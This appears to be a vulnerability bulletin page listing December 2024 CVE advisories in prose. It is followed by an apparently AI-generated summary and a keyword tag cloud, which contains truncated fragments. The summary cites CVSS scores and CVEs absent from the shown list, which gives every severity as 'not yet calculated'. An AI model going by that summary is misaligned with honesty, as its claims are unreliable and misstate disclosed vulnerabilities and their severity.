Misskey is an open source, federated social media platform. In affected versions missing validation in `ApRequestService.signedGet` allows an attacker to create fake user profiles that appear to be from a different instance than the one where they actually exist. These profiles can be used to impersonate existing users from the target instance. Vulnerable Misskey instances will accept spoofed users as valid, allowing an attacker to impersonate users on another instance. Attackers have full control of the spoofed user and can post, renote, or otherwise interact like a real account. This issue has been addressed in version 2024.11.0-alpha.3. Users are advised to upgrade. There are no known workarounds for this vulnerability.
2024-12-18
not yet calculated
CVE-2024-52590

misskey-dev–misskey
Misskey is an open source, federated social media platform. In affected versions missing validation in `ApRequestService.signedGet` and `HttpRequestService.getActivityJson` allows an attacker to create fake user profiles and forged notes. The spoofed users will appear to be from a different instance than the one where they actually exist, and the forged notes will appear to be posted by a different user. Vulnerable Misskey instances will accept the spoofed objects as valid, allowing an attacker to impersonate other users and instances. The attacker retains full control of the spoofed user / note and can interact like a real account. This issue has been addressed in version 2024.11.0-alpha.3. Users are advised to upgrade. There are no known workarounds for this vulnerability.
2024-12-18
not yet calculated
CVE-2024-52591

misskey-dev–misskey
Misskey is an open source, federated social media platform. In affected versions missing validation in `ApInboxService.update` allows an attacker to modify the result of polls belonging to another user. No authentication is required, except for a valid signature from any actor on any remote instance. Vulnerable Misskey instances will accept spoofed updates for remote polls. Local polls are unaffected. This issue has been addressed in version 2024.11.0-alpha.3. Users are advised to upgrade. There are no known workarounds for this vulnerability.
2024-12-18
not yet calculated
CVE-2024-52592

misskey-dev–misskey
Misskey is an open source, federated social media platform.In affected versions missing validation in `NoteCreateService.insertNote`, `ApPersonService.createPerson`, and `ApPersonService.updatePerson` allows an attacker to control the target of any "origin" links (such as the "view on remote instance" banner). Any HTTPS URL can be set, even if it belongs to a different domain than the note / user. Vulnerable Misskey instances will use the unverified URL for several clickable links, allowing an attacker to conduct phishing or other attacks against remote users. This issue has been addressed in version 2024.11.0-alpha.3. Users are advised to upgrade. There are no known workarounds for this vulnerability.
2024-12-18
not yet calculated
CVE-2024-52593

n/a–n/a
A reflected cross-site scripting vulnerability in MONITORAPP Application Insight Web Application Firewall (AIWAF) <= 4.1.6 and <=5.0 was identified on the subpage `/process_management/process_status.xhr.php`. This vulnerability allows an attacker to inject malicious scripts that execute in the context of the victim’s session.
2024-12-20
not yet calculated
CVE-2021-40959

n/a–n/a
OpenCart 4.0.2.3 is vulnerable to Server-Side Template Injection (SSTI) via the Theme Editor Function.
2024-12-18
not yet calculated
CVE-2024-36694

n/a–n/a
Insecure Permissions vulnerability in SecureSTATION v.2.5.5.3116-S50-SMA-B20160811A and before allows a physically proximate attacker to obtain sensitive information via the modification of user credentials.
2024-12-18
not yet calculated
CVE-2024-37649

n/a–n/a
iperf v3.17.1 was discovered to contain a segmentation violation via the iperf_exchange_parameters() function.
2024-12-18
not yet calculated
CVE-2024-53580

n/a–n/a
An issue was discovered in the Webmail Classic UI in Zimbra Collaboration (ZCS) 9.0 and 10.0 and 10.1. A Local File Inclusion (LFI) vulnerability exists in the /h/rest endpoint, allowing authenticated remote attackers to include and access sensitive files in the WebRoot directory. Exploitation requires a valid auth token and involves crafting a malicious request targeting specific file paths.
2024-12-19
not yet calculated
CVE-2024-54663

n/a–n/a
An issue in Quectel BC25 with firmware version BC25PAR01A06 allows attackers to bypass authentication via a crafted NAS message.
2024-12-19
not yet calculated
CVE-2024-54982

n/a–n/a
An issue in Quectel BC95-CNV V100R001C00SPC051 allows attackers to bypass authentication via a crafted NAS message.
2024-12-19
not yet calculated
CVE-2024-54983

n/a–n/a
An issue in Quectel BG96 BG96MAR02A08M1G allows attackers to bypass authentication via a crafted NAS message.
2024-12-19
not yet calculated
CVE-2024-54984

n/a–n/a
An XML External Entity (XXE) injection vulnerability in the component /datagrip/upload of Chat2DB v0.3.5 allows attackers to execute arbitrary code via supplying a crafted XML input.
2024-12-19
not yet calculated
CVE-2024-55081

n/a–n/a
A Server-Side Request Forgery (SSRF) in the endpoint http://{your-server}/url-to-pdf of Stirling-PDF 0.35.1 allows attackers to access sensitive information via a crafted request.
2024-12-19
not yet calculated
CVE-2024-55082

n/a–n/a
Rhymix 2.1.19 is vulnerable to Server-Side Request Forgery (SSRF) in the background import data function.
2024-12-18
not yet calculated
CVE-2024-55089

n/a–n/a
Insufficiently Protected Credentials in the Mail Server Configuration in GoPhish v0.12.1 allows an attacker to access cleartext passwords for the configured IMAP and SMTP servers.
2024-12-19
not yet calculated
CVE-2024-55196

n/a–n/a
An IDOR vulnerability in the edit-notes.php module of PHPGurukul Online Notes Sharing Management System v1.0 allows unauthorized users to modify notes belonging to other accounts due to missing authorization checks. This flaw exposes sensitive data and enables attackers to alter another user’s information.
2024-12-18
not yet calculated
CVE-2024-55231

n/a–n/a
An IDOR vulnerability in the manage-notes.php module in PHPGurukul Online Notes Sharing Management System v1.0 allows unauthorized users to delete notes belonging to other accounts due to missing authorization checks. This flaw enables attackers to delete another user’s information.
2024-12-18
not yet calculated
CVE-2024-55232

n/a–n/a
A reflected Cross-Site Scripting vulnerability in the standard documentation upload functionality in Portabilis i-Educar 2.9 allows attacker to craft malicious urls with arbitrary javascript in the ‘titulo_documento’ parameter.
2024-12-18
not yet calculated
CVE-2024-55239

n/a–n/a
SeaCMS <=13.0 is vulnerable to command execution in phome.php via the function Ebak_RepPathFiletext().
2024-12-18
not yet calculated
CVE-2024-55461

n/a–n/a
An issue in CodeAstro Complaint Management System v.1.0 allows a remote attacker to escalate privileges via the mess-view.php component.
2024-12-18
not yet calculated
CVE-2024-55505

n/a–n/a
An IDOR vulnerability in CodeAstro’s Complaint Management System v1.0 (version with 0 updates) enables an attacker to execute arbitrary code and obtain sensitive information via the delete.php file and modifying the id parameter.
2024-12-18
not yet calculated
CVE-2024-55506

n/a–n/a
SQL injection vulnerability in CodeAstro Complaint Management System v.1.0 allows a remote attacker to execute arbitrary code and escalate privileges via the id parameter of the delete.php component.
2024-12-20
not yet calculated
CVE-2024-55509

n/a–n/a
A vulnerability in Amiro.CMS before 7.8.4 exists due to the failure to take measures to neutralize special elements. It allows remote attackers to conduct a Cross-Site Scripting (XSS) attack.
2024-12-18
not yet calculated
CVE-2024-56115

n/a–n/a
A Cross-Site Request Forgery vulnerability in Amiro.CMS before 7.8.4 allows remote attackers to create an administrator account.
2024-12-18
not yet calculated
CVE-2024-56116

n/a–n/a
A validation integrity issue was discovered in Fort through 1.6.4 before 2.0.0. RPKI Relying Parties (such as Fort) are supposed to maintain a backup cache of the remote RPKI data. This can be employed as a fallback in case a new fetch fails or yields incorrect files. However, the product currently uses its cache merely as a bandwidth saving tool (because fetching is performed through deltas). If a fetch fails midway or yields incorrect files, there is no viable fallback. This leads to incomplete route origin validation data.
2024-12-18
not yet calculated
CVE-2024-56169

n/a–n/a
A validation integrity issue was discovered in Fort through 1.6.4 before 2.0.0. RPKI manifests are listings of relevant files that clients are supposed to verify. Assuming everything else is correct, the most recent version of a manifest should be prioritized over other versions, to prevent replays, accidental or otherwise. Manifests contain the manifestNumber and thisUpdate fields, which can be used to gauge the relevance of a given manifest, when compared to other manifests. The former is a serial-like sequential number, and the latter is the date on which the manifest was created. However, the product does not compare the up-to-dateness of the most recently fetched manifest against the cached manifest. As such, it’s prone to a rollback to a previous version if it’s served a valid outdated manifest. This leads to outdated route origin validation.
2024-12-18
not yet calculated
CVE-2024-56170

n/a–n/a
REDCap through 15.0.0 has a security flaw in the Project Dashboards name, exposing users to a Cross-Site Request Forgery (CSRF) attack. An attacker can exploit this by luring users into clicking on a Project Dashboards name that contains the malicious payload, which triggers a logout request and terminates their session. This vulnerability stems from the absence of CSRF protections on the logout functionality, allowing malicious actions to be executed without user consent.
2024-12-22
not yet calculated
CVE-2024-56310

n/a–n/a
REDCap through 15.0.0 has a security flaw in the Notes section of calendar events, exposing users to a Cross-Site Request Forgery (CSRF) attack. An attacker can exploit this by luring users into accessing a calendar event’s notes, which triggers a logout request and terminates their session. This vulnerability stems from the absence of CSRF protections on the logout functionality, allowing malicious actions to be executed without user consent.
2024-12-22
not yet calculated
CVE-2024-56311

n/a–n/a
A stored cross-site scripting (XSS) vulnerability in the Project Dashboard name of REDCap through 15.0.0 allows authenticated users to inject malicious scripts into the name field of a Project Dashboard. When a user clicks on the project Dashboard name, the crafted payload is executed, potentially enabling the execution of arbitrary web scripts.
2024-12-22
not yet calculated
CVE-2024-56312

n/a–n/a
A stored cross-site scripting (XSS) vulnerability in the Calendar feature of REDCap through 15.0.0 allows authenticated users to inject malicious scripts into the Notes field of a calendar event. When the event is viewed, the crafted payload is executed, potentially enabling the execution of arbitrary web scripts.
2024-12-22
not yet calculated
CVE-2024-56313

n/a–n/a
A stored cross-site scripting (XSS) vulnerability in the Project name of REDCap through 15.0.0 allows authenticated users to inject malicious scripts into the name field of a Project. When a user clicks on the project name to access it, the crafted payload is executed, potentially enabling the execution of arbitrary web scripts.
2024-12-22
not yet calculated
CVE-2024-56314

n/a–n/a
An integer underflow was discovered in Fort 1.6.3 and 1.6.4 before 1.6.5. A malicious RPKI repository that descends from a (trusted) Trust Anchor can serve (via rsync or RRDP) a Manifest RPKI object containing an empty fileList. Fort dereferences (and, shortly afterwards, writes to) this array during a shuffle attempt, before the validation that would normally reject it when empty. This out-of-bounds access is caused by an integer underflow that causes the surrounding loop to iterate infinitely. Because the product is permanently stuck attempting to overshuffle an array that doesn’t actually exist, a crash is nearly guaranteed.
2024-12-22
not yet calculated
CVE-2024-56375

Netskope Inc.–Endpoint DLP
Netskope was made aware of a security vulnerability in Netskope Endpoint DLP’s Content Control Driver where a double-fetch issue leads to heap overflow. The vulnerability arises from the fact that the NumberOfBytesÂ argument to ExAllocatePoolWithTag, and the Length argument for RtlCopyMemory, both independently dereference their value from the user supplied input buffer inside the EpdlpSetUsbActionÂ function, known as a double-fetch. If this length value grows to a higher value in between these two calls, it will result in the RtlCopyMemoryÂ call copying user-supplied memory contents outside the range of the allocated buffer, resulting in a heap overflow. A malicious attacker will need admin privileges to exploit the issue. This issue affects Endpoint DLP version below R119.
2024-12-19
not yet calculated
CVE-2024-11616

OpenText–Operations Bridge Manager
Improper Restriction of XML External Entity Reference vulnerability in OpenTextâ„¢ Operations Bridge Manager allows Input Data Manipulation.Â The vulnerability could be exploited to confidential information This issue affects Operations Bridge Manager: 2017.05, 2017.11, 2018.05, 2018.11, 2019.05, 2019.11, 2020.05, 2020.10.
2024-12-19
not yet calculated
CVE-2021-22501

phpLDAPadmin–phpLDAPadmin
A reflected cross-site scripting (XSS) vulnerability in the ‘Entry Chooser’ of phpLDAPadmin (version 1.2.1 through the latest version, 1.2.6.7) allows attackers to execute arbitrary JavaScript in the user’s browser via the ‘element’ parameter, which is unsafely passed to the JavaScript ‘eval’ function. However, exploitation is limited to specific conditions where ‘opener’ is correctly set.
2024-12-19
not yet calculated
CVE-2024-9101

phpLDAPadmin–phpLDAPadmin
phpLDAPadmin since at least version 1.2.0 through the latest version 1.2.6.7 allows users to export elements from the LDAP directory into a Comma-Separated Value (CSV) file, but it does not neutralize special elements that could be interpreted as a command when the file is opened by a spreadsheet product. Thus, this could lead to CSV Formula Injection.
2024-12-19
not yet calculated
CVE-2024-9102

PlexTrac–PlexTrac
Deserialization of Untrusted Data vulnerability in PlexTrac (Runbooks modules) which allows Object Injection and arbitrary file writes. This issue affects PlexTrac: from 1.61.3 before 2.8.1.
2024-12-16
not yet calculated
CVE-2024-12687

QOS.CH Sarl–logback
Server-Side Request Forgery (SSRF) in SaxEventRecorder by QOS.CH logback version 1.5.12 on the Java platform, allows an attacker to forge requests by compromising logback configuration files in XML. The attacks involves the modification of DOCTYPE declaration inÂ XML configuration files.
2024-12-19
not yet calculated
CVE-2024-12801

QOS.CH Sarl–Logback-core
ACE vulnerability in JaninoEventEvaluator by QOS.CH logback-core upto and including version 1.5.12 in Java applications allows attacker to execute arbitrary code by compromising an existing logback configuration file or by injecting an environment variable before program execution. Malicious logback configuration files can allow the attacker to execute arbitrary code using the JaninoEventEvaluator extension. A successful attack requires the user to have write access to a configuration file. Alternatively, the attacker could inject a malicious environment variable pointing to a malicious configuration file. In both cases, the attack requires existing privilege.
2024-12-19
not yet calculated
CVE-2024-12798

Red Hat–Fast Datapath for RHEL 7
An out-of-bounds read vulnerability was found in DPDK’s Vhost library checksum offload feature. This issue enables an untrusted or compromised guest to crash the hypervisor’s vSwitch by forging Virtio descriptors to cause out-of-bounds reads. This flaw allows an attacker with a malicious VM using a virtio driver to cause the vhost-user side to crash by sending a packet with a Tx checksum offload request and an invalid csum_start offset.
2024-12-18
not yet calculated
CVE-2024-11614

Rockwell Automation–Arena
A third-party vulnerability exists in the Rockwell Automation ArenaÂ® that could allow a threat actor to write beyond the boundaries of allocated memory in a DOE file. If exploited, a threat actor could leverage this vulnerability to execute arbitrary code. To exploit this vulnerability, a legitimate user must execute the malicious code crafted by the threat actor.
2024-12-19
not yet calculated
CVE-2024-11157

Rockwell Automation–Arena
Another "uninitialized variable" code execution vulnerability exists in the Rockwell AutomationÂ ArenaÂ® that could allow a threat actor to craft a DOE file and force the software to access a variable prior to it being initialized. If exploited, a threat actor could leverage this vulnerability to execute arbitrary code. To exploit this vulnerability, a legitimate user must execute the malicious code crafted by the threat actor.
2024-12-19
not yet calculated
CVE-2024-11364

Rockwell Automation–Arena
Another "use after free"Â code execution vulnerability exists in the Rockwell AutomationÂ ArenaÂ®Â that could allow a threat actor to craft a DOE file and force the software to use a resource that was already used. If exploited, a threat actor could leverage this vulnerability to execute arbitrary code. To exploit this vulnerability, a legitimate user must execute the malicious code crafted by the threat actor.
2024-12-19
not yet calculated
CVE-2024-12175

Rockwell Automation–Arena
A third-party vulnerability exists in the Rockwell AutomationÂ ArenaÂ®Â that could allow a threat actor to write beyond the boundaries of allocated memory in a DOE file. If exploited, a threat actor could leverage this vulnerability to execute arbitrary code. To exploit this vulnerability, a legitimate user must execute the malicious code crafted by the threat actor.
2024-12-19
not yet calculated
CVE-2024-12672

Rockwell Automation–PM1k 1408-BC3A-485
A device takeover vulnerability exists in the Rockwell Automation Power Monitor 1000. This vulnerability allows configuration of a new Policyholder user without any authentication via API. Policyholder user is the most privileged user that can perform edit operations, creating admin users and performing factory reset.
2024-12-18
not yet calculated
CVE-2024-12371

Rockwell Automation–PM1k 1408-BC3A-485
A denial-of-service and possible remote code execution vulnerability exists in the Rockwell Automation Power Monitor 1000. The vulnerability results in corruption of the heap memory which may compromise the integrity of the system, potentially allowing for remote code execution or a denial-of-service attack.
2024-12-18
not yet calculated
CVE-2024-12372

Rockwell Automation–PM1k 1408-BC3A-485
A denial-of-service vulnerability exists in the Rockwell Automation Power Monitor 1000. The vulnerability results in a buffer-overflow, potentially causing denial-of-service.
2024-12-18
not yet calculated
CVE-2024-12373

SHUEISHA INC.–"Shonen Jump+" App for Android
Improper authorization in handler for custom URL scheme issue in "Shonen Jump+" App for Android versions prior to 4.0.0 allows an attacker to lead a user to access an arbitrary website via the vulnerable App. As a result, the user may become a victim of a phishing attack.
2024-12-17
not yet calculated
CVE-2024-54125

Sierra Wireless–MGOS
A command injection is possible through the user interface, allowing arbitrary command execution as the root user. oMG2000 running MGOS 3.15.1 or earlier is affected.Â MG90 running MGOS 4.2.1 or earlier is affected.
2024-12-20
not yet calculated
CVE-2020-13712

spaceness–stardust
Stardust is a platform for streaming isolated desktop containers. With this exploit, inter container communication (ICC) is not disabled. This would allow users within a container to access another containers agent, therefore compromising access.The problem has been patched in any Stardust build past 12/20/24. Users are advised to upgrade. Users may also manually disable ICC if they are unable to upgrade.
2024-12-20
not yet calculated
CVE-2024-56330

Unknown–GTPayment Donations
The GTPayment Donations WordPress plugin through 1.0.0 does not have CSRF check in some places, and is missing sanitisation as well as escaping, which could allow attackers to make logged in admin add Stored XSS payloads via a CSRF attack.
2024-12-21
not yet calculated
CVE-2024-11607

withastro–astro
Astro is a web framework for content-driven websites. A bug in the build process allows any unauthenticated user to read parts of the server source code. During build, along with client assets such as css and font files, the sourcemap files **for the server code** are moved to a publicly-accessible folder. Any outside party can read them with an unauthorized HTTP GET request to the same server hosting the rest of the website. While some server files are hashed, making their access obscure, the files corresponding to the file system router (those in `src/pages`) are predictably named. For example. the sourcemap file for `src/pages/index.astro` gets named `dist/client/pages/index.astro.mjs.map`. This vulnerability is the root cause of issue #12703, which links to a simple stackblitz project demonstrating the vulnerability. Upon build, notice the contents of the `dist/client` (referred to as `config.build.client` in astro code) folder. All astro servers make the folder in question accessible to the public internet without any authentication. It contains `.map` files corresponding to the code that runs on the server. All **server-output** projects on Astro 5 versions **v5.0.3** through **v5.0.7**, that have **sourcemaps enabled**, either directly or through an add-on such as `sentry`, are affected. The fix for **server-output** projects was released in **astro@5.0.8**. Additionally, all **static-output** projects built using Astro 4 versions **4.16.17 or older**, or Astro 5 versions **5.0.8 or older**, that have **sourcemaps enabled** are also affected. The fix for **static-output** projects was released in **astro@5.0.9**, and backported to Astro v4 in **astro@4.16.18**. The immediate impact is limited to source code. Any secrets or environment variables are not exposed unless they are present verbatim in the source code. There is no immediate loss of integrity within the the vulnerable server. However, it is possible to subsequently discover another vulnerability via the revealed source code . There is no immediate impact to availability of the vulnerable server. However, the presence of an unsafe regular expression, for example, can quickly be exploited to subsequently compromise the availability. The fix for **server-output** projects was released in **astro@5.0.8**, and the fix for **static-output** projects was released in **astro@5.0.9** and backported to Astro v4 in **astro@4.16.18**. Users are advised to update immediately if they are using sourcemaps or an integration that enables sourcemaps.
2024-12-19
not yet calculated
CVE-2024-56159

Xen–Xen
A cross-privilege Spectre v2 vulnerability allows attackers to bypass all deployed mitigations, including the recent Fine(IBT), and to leak arbitrary Linux kernel memory on Intel systems.
2024-12-19
not yet calculated
CVE-2024-2201

Xen–Xen
The hypervisor contains code to accelerate VGA memory accesses for HVM guests, when the (virtual) VGA is in "standard" mode. Locking involved there has an unusual discipline, leaving a lock acquired past the return from the function that acquired it. This behavior results in a problem when emulating an instruction with two memory accesses, both of which touch VGA memory (plus some further constraints which aren’t relevant here). When emulating the 2nd access, the lock that is already being held would be attempted to be re-acquired, resulting in a deadlock. This deadlock was already found when the code was first introduced, but was analysed incorrectly and the fix was incomplete. Analysis in light of the new finding cannot find a way to make the existing locking discipline work. In staging, this logic has all been removed because it was discovered to be accidentally disabled since Xen 4.7. Therefore, we are fixing the locking problem by backporting the removal of most of the feature. Note that even with the feature disabled, the lock would still be acquired for any accesses to the VGA MMIO region.
2024-12-19
not yet calculated
CVE-2024-45818

Xen–Xen
PVH guests have their ACPI tables constructed by the toolstack. The construction involves building the tables in local memory, which are then copied into guest memory. While actually used parts of the local memory are filled in correctly, excess space that is being allocated is left with its prior contents.
2024-12-19
not yet calculated
CVE-2024-45819

AI Summary and Description: Yes

**Summary**: The provided text details numerous cybersecurity vulnerabilities identified in various software products, highlighting critical, high, medium, and low vulnerabilities along with their descriptions, potential impact (CVSS scores), and recommended remediation steps. This information is essential for security professionals working on vulnerability management, compliance, and threat mitigation strategies.

**Detailed Description**: The text consists of an extensive list of vulnerabilities across a wide array of software products, detailing specific security risks, their CVSS scores (ranging from critical to low), and the necessary patching or mitigation actions recommended to address these vulnerabilities.

– **Vulnerability Overviews**:
– **Critical Vulnerabilities**: Includes instances like SQL Injection, Cross-Site Scripting (XSS), and Command Injection that could enable remote code execution, unauthorized data access, and other severe consequences. For example:
– A critical SQL injection vulnerability found in ‘Codezips E-Commerce Site’ allows attackers to manipulate database queries remotely (CVE-2024-12884).
– Adobe Acrobat Reader has multiple vulnerabilities allowing arbitrary code execution or sensitive data disclosure (CVE-2024-44195, CVE-2024-44519).
– **High Vulnerabilities**: Various older systems and plugins show weaknesses, such as improper input validation leading to information exposure or unexpected behaviors facilitating denial of service.
– **Medium Vulnerabilities**: Many plugins for WordPress exhibit issues related to insufficient input sanitization leading to XSS vulnerabilities, opening paths for administrative account compromise.
– **Low Vulnerabilities**: Highlighted issues are often less impactful but still require attention as they could lead to larger security concerns when compounded with other vulnerabilities.

– **Impact Assessment**:
– Each vulnerability is classified using the CVSS score system, emphasizing the urgency of applicable security measures. Critical vulnerabilities often score above 9.0, while lower priority issues hover around scores of 4.0 or lower.

– **Recommendations for Professionals**:
– Security teams should prioritize patching any critical vulnerabilities, especially those associated with SQL injection and arbitrary code execution.
– Regular vulnerability assessments and reviews should be part of organizational security practices to identify and mitigate risks promptly.
– Continuous monitoring and threat intelligence gathering can improve an organization’s resilience to emerging vulnerabilities and exploits.

– **Mitigation Strategies**:
– Implementing rigorous testing and code review practices to prevent vulnerabilities during development, especially within custom software.
– Employ security patches and updates as they become available.
– Training staff on security hygiene can reduce the success of social engineering attacks that exploit user behavior alongside software vulnerabilities.

Overall, understanding and addressing these vulnerabilities is critical for maintaining robust cybersecurity and compliance across organizational infrastructures. Security professionals must stay ahead of potential threats and implement best practices to protect sensitive data and systems from exploitation.

.NET 01 1 1984 2 2024 2FA 3 3d 4 5 7 a abuse access access control access controls access privileges access token access tokens account compromise account takeover ACPI Act administrative privileges administrators Adobe Adobe Acrobat Adobe Acrobat Reader advisory Africa age verification agent agents AGI agnostic AI Aiven algorithm algorithms Amazon analysis analytics and Android Animation anti Apache Apache Kafka API APIs Apple Application applications arbitrary code execution Arch Aria ARM art as assessment attack attackers attacks authentication Authentication Bypass authentication bypass vulnerability authentication mechanisms Authentication Process authentication vulnerability authorization Auto Autodesk automation availability AWS Axon B2B backend backup backups bandwidth based based buffer overflow Behavior Best best practices BeyondTrust Bitwarden Bluesky Bluetooth board Broadcom browser Buffer Overflow Bug business by bypass C C2 CAPTCHA Casio catalog cell certificate validation chain chat checking checksum chip Chrome Chromium CIA CISA class CleaR client clients closed Cloud cloud platforms cloud-native cluster cluster management code code execution code injection code review code validation coding Col collaboration collaborative command command execution command injection Command Injection Vulnerability command line commerce Common Vulnerabilities Common Vulnerabilities and Exposures communication communication channels community compilation complexity compliance composition compute concept concerns confidential information confidentiality Configuration Consent Console construction container container platform containers content Context continuous monitoring control controllers controls cookies core cost CoT creation credential credentials critical critical vulnerability cross cross-site scripting cross-site scripting (XSS) Crypto cryptographic Cryptographic Algorithms css Curl Current Customer customizable customization CVE CVSS cyber Cybersecurity cybersecurity vulnerabilities D dashboard dashboards data data access data analytics data center data corruption data exfiltration data interception data manipulation data scientists data vulnerability database Databricks de decryption default credentials DeFi Dell Delta Delta Electronics demo denial Denial of Service deployment deserialization deserialization vulnerability design Desktop developer developers development digital directory traversal disclosure Docker document documentation domain domains DoS DoT downloader driven dual e e-commerce ecommerce edge editing EDR effective Elasticsearch election elevation of privileges email email addresses email protection encrypted communication encryption encryption keys encryption protocol end endpoint enforcement engineering enterprise enumeration environment environment variables Envoy EoL ERP EU evaluator event Excel execution exfiltration exp experience expert exploit Exploitation exploits exploration export Exposures extensions External F5 face fact factory reset fail fast fault features feedback fees file encryption file system access File Transfers finance financial fine firewall firmware firmware update first Flipkart for FortiGate FortiManager Fortinet framework frameworks friendly FTC full functionality future g Gateway Gen generated generation geo geospatial data GIS git GitHub GitLab Glue Go Go Implementation Golang Google Google Chrome grade grading graph Group gs h3 hack hardware HashiCorp health Health Information heap heap-based buffer overflow Hewlett Packard Enterprise high high availability high-performance Highlight hiring hosted hosting hotfix HPE HR http HTTPS Huawei Hyper hypervisor IAM IBM ICO identifiers identity image image files immutable impact assessment implementation in incident incident response Inclusion industry information information disclosure information leak information leakage infrastructure injection injection vulnerabilities Injection vulnerability input validation insights installation integration integrations integrity Intel intelligence intelligence gathering inter interaction intern internet interpret inux IoC iOS iOS 18 IoT IPO Iran IRS ite J jack Java Java 8 Java applications JavaScript JavaScript code JetBrains job json JSON Web Token Just k Kafka Kerberos kernel KeyCloak keys knowledge l Labor language large LaTeX law learning least led Lee Lenovo library life Link Linux Linux Kernel Lite llm llms lm local privilege escalation localhost logging logic logs long loop low mac machine MacOS Magic making malicious actions malicious attack malicious code malicious JavaScript man-in-the-middle attack man-in-the-middle attacks management management console Management System manipulation markdown matt max media memory memory access memory corruption Meta metadata Micro Microsoft Microsoft Teams middleware Mila mini Mir mission misuse mitigation mitigation strategies mitigations ML Mobile Mobile App mobile apps ModI Monitor monitoring multi my MySQL namespace nation native network networks neutral news next Next.js NIST Nix no Node Node.js non non-root user notes notifications npm NPU NSA NTP o OAuth OCR oE of off offs on one oost open open-source OpenShift operating system operation Operator opilot opt optimization optimizations orchestrator organization organizational security ory out Outlook over PAM parameter parsing party party components password requirements passwords Patch patches patching path traversal path traversal vulnerability path validation PCs pdf performance permissions personally identifiable information Personally Identifiable Information (PII) phi phishing phishing attack Phishing Attacks physical access Pixel plugin plugins point policy porting post Postgre Postgres PostgreSQL Power pre Preloading preparation Preview price privacy privacy issue privilege escalation privilege management privileged access Privileged Access Manager problem processes processing product products professionals profit Progress project management projects prompt proof protected health information protocol proxy public push notifications Py Python question QUIC R R1 R2 race condition rack rag rate Ray RCE RDP react real recruitment recurring payments red Red Hat Region release releases remediation Remote Access remote attackers Remote Code Execution rendering repair replication report reporting repository Requirements resilience resiliency resolution resource consumption resources response restore return reverse proxy revision right Rigorous Testing Risk risks Ro Rock Rockwell Automation ROI Role Root Privileges Route Origin Validation RPKI RSA rsync RTOS Rust s S3 Sable safety sales sandbox sandboxing satellite Schneider Electric scientists SD search search feature sec secrets secure secure access security security and compliance Security Checks security concerns Security Flaw security hygiene security measure security measures security mechanisms security patch security patches security practices security professionals security restrictions security risk security risks security teams Security Vulnerabilities security vulnerability Segment segmentation self sensitive data sensitive files sensitive information sequence server server configuration Server-Side Request Forgery servers service service account services session data settings severity SHA sharing short side SIEM Siemens Sig signature verification signatures Sim Simple single site request forgery site scripting Slack Snyk SoC social social engineering social engineering attacks social media software software update software vulnerabilities Sophos source source code source Platform source software spam Spectre sql SRE SSE SSH SSL stability stack Stack Overflow start state state management storage Streaming structures subscription supply SVG symmetric encryption Synology syscall system system integrity system operations systems T Tails tampering Task taxonomy Teams tech techniques technologies technology telecom templates terminal test Testing text the theft third third-party thread safety Threads threat threat actor threat actors threat intelligence threat mitigation threat mitigation strategies threats Time time monitoring TLS to token tokens tool tooling toolkit tools Tor TP tracking training transport security trie trust two Type Confusion UI UK unauthenticated unauthorized access Unix up update updates upgrade ups US usage use user User Access user behavior user consent user data user feedback user information user interaction user interface user management user-friendly uth uv V V3 v6 val Validation validation checks Vault vectors vendor Vercel verification version video Vim virtual machine Vision voice VPN vulnerabilities vulnerability vulnerability assessment vulnerability assessments Vulnerability Management WAN web web application firewall web applications web browser web browsers web interface web server web shell Web Tokens webb website Well whisper Wi widgets Wind Windows Windows 11 WordPress workload Workload Identity x Xen XML XR XSS Yjs YouTube Zendesk zero Zimbra zk Zoom